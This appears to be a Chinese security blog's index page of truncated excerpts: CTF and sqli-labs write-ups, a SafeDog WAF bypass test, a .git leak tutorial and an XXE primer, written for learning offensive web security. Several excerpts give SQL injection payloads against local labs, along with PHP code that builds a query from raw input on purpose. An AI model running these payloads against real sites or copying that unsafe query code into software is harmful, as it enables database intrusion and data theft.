兵器1024所下载题目所给的icmp.pcapng流量包,用Wireshark打开。
可以发现确实如其名,均为ICMP协议流量包。因为ICMP协议是通过request请求发送数据的,可以看出192.168.201.131是发包者,于是可以利用wireshark过滤器进行筛选下:
1ip.src == 192.168.201.131
然后打开前面俩个数据包,发现了规律,flag就藏在此字段中。
然后依次将所有的request包该字段数据给记录下来。但是在其中发现了几个数据包该字段值为08。开始以为这些是空格,把这些删除了提交,但依旧错误。紧接着又把它当成.提交,仍然不成功。于是Goo...
Abstract环境:
phpstudy
safedog v3.5正式版
代码:
1234567891011121314<?php$db = new PDO('mysql:host=localhost;dbname=test','root','yoga');$id = @$_GET['id'];$sql = "select * from stu where id=".$id;echo $sql;echo "<br>";try{ $res = $db->query($sql) or var_dump($db->errorInfo()); ...
0x00 前言最后一个阶段了,继续干活
0x01 干活Less-54这题好像有次数限制,最多只能十次。但是经测试可能是单引号闭合的,于是payload:
http://localhost/sqli/Less-54/?id=1' and 1=1--+
利用:
1.爆库名:
http://localhost/sqli/Less-54/?id=-1' union select 1,2,database()--+
2.爆表名:(challenges )
1http://localhost/sqli/Less-54/?id=-1' union select 1,2,(SE...
0x00 前言注入天书的第三阶段,外面雾霾挺大的,继续干活。
0x01 干活Less-38(堆叠注入)1.原理:
在SQL中,分号(;)是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql语句后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠注入。
2.实例:
假如查询语句为:select * from users;
123456789101112131415mysql> select * from users ;+----+----------+------------+| id | username | password |+----+---...
0x00 前言十二月如期而至,今天继续干活。
0x01 Bypass之旅Less-23点开进去,发现Please input the ID as parameter with numeric value一行Tip,于是传入id=1,尝试构造?id=1' and '1'='1发现成功绕过。
payload:
http://localhost/sqli/Less-23/?id=-1' union select 1,2,3 and '1' ='1
后面利用方式一直。查看源码发现,过滤了#、--
sqlmap 利用:
1pytho...
0x00 前言
岁月是一场有去无回的旅行,好的坏的都是风景
十一月的最后一天了,明天就是2018年最后的月份了,光阴似箭,感慨万千。趁着周末,撸下Mysql手工注入,加深SQL注入的理解。
0x01 报错注入Less-1打开网页,传入一个id=1发现有显示,于是尝试构造payload
123http://localhost/sqli/Less-1/index.php?id=1' and 1=1--+ //不报错http://localhost/sqli/Less-1/index.php?id=1' and 1=2--+ //报错
于是说明存在字符型注入,于是...
0x00 前言做CTF时遇见过.git源码泄露,但是由于不熟悉git命令,故开始学习
0x01 Git简介Git作为一个出自Linus之手的分布式文件管理系统,可以有效、高速地处理从很小到非常大的项目版本管理 。
0x02 理论基础
你的本地仓库由 git 维护的三棵“树”组成。第一个是你的 工作目录,它持有实际文件;第二个是 缓存区(Index),它像个缓存区域,临时保存你的改动;最后是 HEAD,指向你最近一次提交后的结果。
SVN记录的是每一次版本的变动
而git是将每个版本独立保存
三棵树:(工作区域、暂存区域和本地仓库)
工作流程:
在工作目录中添加、修改文件
...
0x01 前言第一次正式参加这种CTF,写题的时候发现了很多不足,基础不够扎实,还是得艰苦奋斗。。
0x02 Write Up签到题最爱做签到题了 hhhhhhh
直接Bp抓包 可以得到flag
滴!晨跑打卡打开是一个搜索功能的index,应该是考察sql注入,于是手工fuzz测试过滤的字符
其中空格、双引号、减号被过滤,可以用%a0或者/**/替代空格
1.爆出位置
1http://ctfgame.acdxvfsvd.net:20001/index.php?id=1'%a0union%a0select%a01,2,3%a0and%a0'1'=&apos...
0x00 前言XXE是一种很常见的漏洞类型危害也挺大的,如果一个web服务器通过用户上传处理XML文件或POST请求时,那么可能就会存在漏洞。
前段时间比较出名的微信支付的xxe漏洞
0x02 漏洞简介XXE 就是XML外部实体注入。当服务器允许引用外部实体时,通过构造恶意内容来攻击网站
2.1 产生原因解析xml文件时允许加载外部实体,并且实体的URL支持file://和PHP://等协议,没有过滤用户提交的参数。
2.2 危害
读取任意文件
执行系统命令
探测内网端口
攻击内网网站
DOS攻击
….
0x03 XML+DTD基础知识XML:
XML 指可扩展标记语言(EXten...
0x01 前言前段时间把实验吧的入门ctf练了一遍,想继续深入ctf,于是选择了比较基础的南邮的ctf题目(CG-CTF),于是写个Writeup记录下学习过程。
0x02 Write Up签到题直接查看源代码即可获取flag
md5 collision12345678910$md51 = md5('QNKCDZO');$a = @$_GET['a'];$md52 = @md5($a);if(isset($a)){if ($a != 'QNKCDZO' && $md51 == $md52) { echo "nctf{*********...